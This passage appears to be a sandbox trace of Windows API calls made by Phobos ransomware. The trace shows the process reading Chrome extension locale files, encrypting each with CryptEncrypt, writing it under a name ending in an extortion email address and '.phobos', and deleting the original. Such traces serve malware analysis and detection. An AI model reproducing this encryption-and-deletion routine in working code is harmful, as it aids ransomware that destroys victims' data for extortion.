dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0, dwBufLen=0x2a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0) returned 1 [0159.205] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2a0, lpOverlapped=0x0) returned 1 [0159.206] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0159.206] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0159.206] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0159.206] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.206] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0159.207] CryptDestroyKey (hKey=0xa327e8) returned 1 [0159.207] CloseHandle (hObject=0x138) returned 1 [0159.207] CloseHandle (hObject=0x194) returned 1 [0159.207] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json")) returned 1 [0159.208] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0159.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0159.208] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=812) returned 1 [0159.208] CloseHandle (hObject=0x194) returned 1 [0159.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json")) returned 0x2020 [0159.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0159.208] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0159.208] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0159.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0159.209] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0159.209] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0159.209] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x32c, lpOverlapped=0x0) returned 1 [0159.215] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x330, dwBufLen=0x330 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x330) returned 1 [0159.215] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x330, lpOverlapped=0x0) returned 1 [0159.215] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0159.215] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0159.215] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0159.215] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.215] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0159.216] CryptDestroyKey (hKey=0xa327e8) returned 1 [0159.216] CloseHandle (hObject=0x194) returned 1 [0159.216] CloseHandle (hObject=0x138) returned 1 [0159.216] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json")) returned 1 [0159.217] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0159.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0159.217] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1099) returned 1 [0159.217] CloseHandle (hObject=0x138) returned 1 [0159.217] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json")) returned 0x2020 [0159.217] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0159.217] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0159.217] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0159.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0159.218] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0159.218] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0159.218] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x44b, lpOverlapped=0x0) returned 1 [0159.226] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x450, dwBufLen=0x450 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x450) returned 1 [0159.226] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x450, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x450, lpOverlapped=0x0) returned 1 [0159.227] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0159.227] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0159.227] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0159.227] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.227] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0159.227] CryptDestroyKey (hKey=0xa327e8) returned 1 [0159.227] CloseHandle (hObject=0x138) returned 1 [0159.227] CloseHandle (hObject=0x194) returned 1 [0159.227] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json")) returned 1 [0159.228] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0159.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0159.228] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=789) returned 1 [0159.228] CloseHandle (hObject=0x194) returned 1 [0159.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json")) returned 0x2020 [0159.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0159.229] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0159.229] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0159.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0159.229] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0159.229] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0159.229] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x315, lpOverlapped=0x0) returned 1 [0159.702] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x320, dwBufLen=0x320 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x320) returned 1 [0159.702] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x320, lpOverlapped=0x0) returned 1 [0159.703] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0159.703] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0159.703] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0159.703] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.703] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0159.703] CryptDestroyKey (hKey=0xa327e8) returned 1 [0159.703] CloseHandle (hObject=0x194) returned 1 [0159.703] CloseHandle (hObject=0x138) returned 1 [0159.703] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json")) returned 1 [0159.704] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0159.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0159.705] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=595) returned 1 [0159.705] CloseHandle (hObject=0x138) returned 1 [0159.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json")) returned 0x2020 [0159.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0159.705] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0159.705] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0159.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0159.706] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0159.706] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0159.706] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x253, lpOverlapped=0x0) returned 1 [0159.725] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x260, dwBufLen=0x260 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x260) returned 1 [0159.725] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x260, lpOverlapped=0x0) returned 1 [0159.725] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0159.725] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0159.725] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0159.726] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.726] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0159.726] CryptDestroyKey (hKey=0xa327e8) returned 1 [0159.726] CloseHandle (hObject=0x138) returned 1 [0159.726] CloseHandle (hObject=0x194) returned 1 [0159.726] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json")) returned 1 